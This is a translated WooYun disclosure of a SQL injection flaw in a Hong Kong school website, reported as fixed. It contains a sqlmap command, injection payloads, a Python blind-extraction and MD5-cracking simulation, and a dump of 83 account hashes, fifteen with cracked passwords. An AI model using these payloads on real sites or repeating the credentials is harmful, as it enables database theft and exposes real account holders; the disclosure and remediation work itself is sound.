
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0149049

Title: SQL injection vulnerability at 香港拔萃男书院 (Diocesan Boys' School, Hong Kong) (user login passwords obtainable)

Related vendor: hkcert (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre)

Author: 路人甲

Submitted: 2015-10-25 12:37

Fixed: 2015-10-29 15:03

Published: 2015-10-29 15:03

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to third-party partner organisation (HKCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-25: Details sent to the vendor, awaiting vendor handling
2015-10-28: Vendor confirmed; details visible to the vendor only
2015-10-29: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

A SQL injection vulnerability in one page of the 香港拔萃男书院 (Diocesan Boys' School, Hong Kong) website allows user login credentials (password hashes, fifteen of which crack to plaintext) to be retrieved.

Detailed description:

Test URL: http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11

python sqlmap.py -u "http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11" -p parentid --technique=BE --random-agent -D swims -T login -C login,passwd --dump --threads=10

(-p parentid tests only the parentid parameter; --technique=BE limits sqlmap to boolean-based blind and error-based injection; --random-agent rotates the User-Agent; -D/-T/-C with --dump pulls the login and passwd columns of the swims.login table.)

Proof of vulnerability:

---
Parameter: parentid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: parentid=5 AND 4092=4092&sid=11
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
current user: 'swims_view@localhost'
current user is DBA: False
database management system users [1]:
[*] 'swims_view'@'localhost'
available databases [2]:
[*] information_schema
[*] swims
Database: swims
[5 tables]
+-----------+
| section |
| content |
| log |
| login |
| templates |
+-----------+
Database: swims
Table: login
[9 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| session | varchar(32) |
| ip | varchar(15) |
| lastip | varchar(15) |
| laststatus | int(1) |
| lasttime | int(11) |
| login | varchar(32) |
| passwd | varchar(32) |
| slevel | int(1) |
| type | int(1) |
+------------+-------------+
Database: swims
Table: login
[83 entries]
+-------------------+----------------------------------------------+
| login | passwd |
+-------------------+----------------------------------------------+
| 10km | 9aa2eb58d61546c12062cd3f9456a5d1 |
| aa | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty) |
| admissionnewsclip | 8118c2d628b8366ae3f24a6bcac8c16f |
| art | 002d25e087bb1a7f1dc252ff5e48f005 |
| astronomy | c3f8326e6f0cc970cc71e61358e19a81 |
| av | 1449a8ddaf572b9301467467e6b6339e |
| aviation | 15cc4b82249c7b030de7ea16a3216a1e |
| boarding | 2bb53bb81d373a2b4f072e01e655085f |
| bridge | 8d2f6b5e556ad014146a93a1d8b9ab23 |
| bs | 4e333762c9f4a75e6bf8958ea06411aa |
| bsd | 192de2b21c647bf17b7f5abb7d5383f7 |
| cdrama | cdc9ae8277415733ad81ddc6a07981c2 |
| cf | 5ce73527feaadc85e2476af0ecc4328d (jesus!) |
| chem | f08f90ffbf587b05e26f17616aea73ee |
| chess | 46e44aa0bc21d8a826d79344df38be4b (123qweASD) |
| chihist | 21ef6578156b72a3437d9a0a12bd6586 |
| chinese | f679585e513e53560c45c3eb3d8f0f1a |
| chist | a356eab069e616150d8e6ecb916b54b8 |
| christian_fellow | 5ce73527feaadc85e2476af0ecc4328d (jesus!) |
| civic | c89ea82733108fc18e313df856c06c69 |
| clit | 53b69cccf5cb56ddf840a87777454367 |
| cs | 94b6c955e00906fb624054440a30b316 |
| dbsfoundation | 8dbe46fcc067742bd8b714054d1f9d50 |
| dbspta | 95de7d8c91d5e8bfb8d44acc00b6a6b0 |
| discipline | 83d270632c591d1a2d03bd46389c469b |
| dse | b4c05802f985c1afabc09bb798241d40 |
| dt | cf4cdc9a5e4d358dd07ba2b8393a2488 |
| ecs | 473db90092021f87fa0a63f9ef425c1b |
| english | e13640f4976a0907fc7c1d234ff6494d |
| englit | 1ac1d1b636cc832803ed530293385daf |
| es | 30170728ebb8b4d60c2c9b812ac1b8dc |
| film | 464abfcded00e155ad5889d869db374e |
| fitness | 7f2b344bd50be2eb0f1b42626bd09834 |
| french | d9cc313b5aa1f565080147bc2ca8499a |
| frenchclub | 22f50be93526facc4ca1fc278ee1c179 (123666) |
| furtherstudies | c352c4e5fad78f8a6c46a5a3d57861f2 |
| geog | 2724f752f24063e574c81c348a8d1796 |
| german | d1449c30287f1c2bb4b3ec73d295c970 |
| gifted | d50421f925321162959c0d316dbcd869 |
| golf | 9adf5339387a8d22144f446a92825639 |
| hist | 60b80a112b377d52354a876528866b10 |
| history | 41fc5fb9a61826dfb8e15f1282e87683 |
| ib | 089cc6d2ee24461120321e10b5726b86 |
| ib2 | 0b64ae66d9cb7d486112d8ae4401b299 |
| interschoolsports | 8c5d801f845c0b895e57daf839f8bafa |
| itwg | e6636644175f9929297189ab8cc07bbf |
| japan | 51f6f8fe03a390d3de50ad49913d4b66 (123459) |
| liberal | ede4c8eecb58a906d62f4b34570213b9 |
| mac | ae1984395283212c7e80f957c33e0f2b |
| magic | 58d9fc4c07b9d40af63d927cfbc14e28 |
| martial | b69590c12f099d6cc07886f338d05620 |
| maths | 5ae3295dd469f90a9f10c8f1a6958459 |
| mgeog | 12f3c96e3c90308dd19e2905aeee15e9 |
| mmusic | 18ff6fa7f4eca64df1b3ffc80ee42518 |
| music | 1a4d4ac1a856d940d06f8acf221cea64 |
| nss | 8cd211b9d2d45c858d258bbaac786a21 |
| ocean | 5c8e51474d56c3c9a8d66f5c322f837b |
| oi | 4f4800afe4fc855934925fe9fc34a540 |
| orient | 912bd9472e011e911020fe6cc0e5d4fd |
| parents | db34ea86820b356e164ee3c2177a2f30 |
| pe | 5a8dd3ad0756a93ded72b823b19dd877 (hello!) |
| phil | bad2d158a6b400f2e239b148c52f50ed |
| phototeam | b7ed6efbb82513e00d32677557c92367 |
| psych | 3c4b15a545de56b7625e8a615ee56280 |
| puto | 440f81760c3f988302f8aad3956458de |
| puzzle | 016b51b6479c0a46c8e9f293ac930a79 |
| quintak | ef58bcce3670da846d4c9c5de9f715ec |
| sc | 0875daa9eebf3080701ec100e3b6052f |
| science | 8b0dc2e34844337434b8475108a490ab (hohoho) |
| skygarden | f35b2e980682264dc65a1eb332cfddee |
| smath | a83862769f78fffb512bc9283007ef67 (maxmax) |
| social | 1b7037d2fece1fb637abe26d058f4a8a (social123) |
| socialsoc | 9f9fb8fa8c9308d1a84db37317c34acf |
| sports | 5a8dd3ad0756a93ded72b823b19dd877 (hello!) |
| sportsfed | ede476f066abde060a857477d38ef47e |
| stamp | c1c824cfd0c5499563b055525035c137 (marcopolo) |
| swim | f6ead7bf3faa8ad4be6310874328ad80 |
| swimming | 862cdea78c758ed6d664cc6af403b4a9 |
| tennis | 7daacea5f373b4c1c054158b126d317f (dennis) |
| test | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| testsite | 16d7a4fca7442dda3ad93c9a726597e4 (test1234) |
| varts | 079dec77a9ae897a8dcc0d9f1a6c9cdf |
| waterpolo | 397315245557848ce2a4207139d81827 |
+-------------------+----------------------------------------------+

Remediation:

Add input filtering. Concretely: parentid and sid are numeric, so cast them to integers (or reject anything that is not a digit string) and pass them to the query as bound parameters instead of concatenating the raw GET values into SQL; filtering on its own is easy to bypass. Separately, the passwd column holds unsalted 32-hex-character MD5 hashes: the accounts pe and sports share one hash (hello!), as do cf and christian_fellow (jesus!), which shows there is no per-user salt, and sqlmap's dictionary attack recovered fifteen plaintexts directly from the dump. Re-hash stored passwords with a salted, iterated scheme and rotate the exposed credentials.
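As an added example, not code from the original report or from the affected site: a self-contained Python simulation of the boolean-based blind injection shown in the proof section, together with the hardened query the remediation calls for. It assumes an in-memory SQLite stand-in for the swims database with a constructed section table and login table (every table column, sample account and password here is an assumption for illustration), a vulnerable_handler that builds its query the way the affected index.php evidently does, and a hardened_handler that validates and binds the parameters. blind_extract implements the per-character binary search behind sqlmap's --technique=B using only the page's true/false behaviour, crack_md5 shows why unsalted MD5 gives up plaintext, and hash_password/verify_password show a salted PBKDF2 replacement.

```python
import hashlib
import os
import sqlite3

# Constructed sample accounts (not data from the report). Stored the way the dumped
# swims.login table evidently stores them: unsalted MD5 in a 32-character column.
SAMPLE_USERS = {"test": "testtest", "furtherstudies": "Ns7!kq-2020"}
SAMPLE_WORDLIST = ["qwerty", "hello!", "123456", "testtest", "test1234"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the swims database (assumed schema for section)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE section (id INTEGER, parentid INTEGER, title TEXT)")
    con.execute("CREATE TABLE login (login TEXT, passwd TEXT)")
    con.executemany("INSERT INTO section VALUES (?, ?, ?)",
                    [(11, 5, "Further studies"), (12, 6, "Other")])
    con.executemany("INSERT INTO login VALUES (?, ?)",
                    [(u, md5_hex(p)) for u, p in SAMPLE_USERS.items()])
    return con


def vulnerable_handler(con, parentid: str, sid: str) -> bool:
    """Assumed shape of the original index.php query: raw GET values pasted into SQL.
    Returns whether a section row comes back, i.e. whether the page renders normally;
    that difference is the attacker's boolean oracle."""
    sql = f"SELECT title FROM section WHERE parentid={parentid} AND id={sid}"
    return con.execute(sql).fetchone() is not None


def hardened_handler(con, parentid: str, sid: str) -> bool:
    """Fix: reject anything that is not a digit string, then bind the values."""
    if not (parentid.isdigit() and sid.isdigit()):
        raise ValueError("parentid and sid must be integers")
    row = con.execute("SELECT title FROM section WHERE parentid=? AND id=?",
                      (int(parentid), int(sid))).fetchone()
    return row is not None


def blind_extract(oracle, subquery: str, length: int) -> str:
    """Boolean-based blind extraction: a binary search on the code point of each
    character, asking only 'did the page come back normal?'. SQLite's unicode() and
    substr() stand in for the MySQL ORD()/MID() used in sqlmap's payloads."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                       # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}),{pos},1))>{mid}"
            if oracle(f"5 AND {cond}"):        # same form as 'parentid=5 AND 4092=4092'
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def recover_hash_blind(con, username: str) -> str:
    """Pull one user's passwd hash through the vulnerable handler without ever
    seeing query output directly (32 characters, as in the dumped column)."""
    oracle = lambda injected: vulnerable_handler(con, injected, "11")
    return blind_extract(oracle, f"SELECT passwd FROM login WHERE login='{username}'", 32)


def crack_md5(digest: str, wordlist=SAMPLE_WORDLIST):
    """Unsalted MD5 falls to a dictionary lookup, which is what the plaintexts in
    parentheses in the dump are. Returns the password or None."""
    for word in wordlist:
        if md5_hex(word) == digest:
            return word
    return None


def hardened_rejects_payload(con) -> bool:
    """The same payload against the parameterised handler is refused outright."""
    try:
        hardened_handler(con, "5 AND 4092=4092", "11")
    except ValueError:
        return True
    return False


def hash_password(password: str, salt=None) -> str:
    """Replacement for unsalted MD5: random per-user salt plus PBKDF2-HMAC-SHA256."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"pbkdf2_sha256$200000${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return dk.hex() == dk_hex


if __name__ == "__main__":
    db = make_db()
    h = recover_hash_blind(db, "test")
    print("extracted:", h, "->", crack_md5(h))
    print("hardened handler rejects payload:", hardened_rejects_payload(db))
```

Running the script recovers the constructed test account's hash one character at a time through nothing but true/false page responses, cracks it with a five-word list (the hash of testtest is the same 05a671c66aefea124cc08b76ea6d30bb that appears in the dump), and shows the identical payload failing against the bound-parameter handler.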

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-10-28 12:00

Vendor comment:

The incident has been reported to the organisation concerned.

Latest status:

2015-10-29: The organisation concerned reports that the vulnerability has been fixed.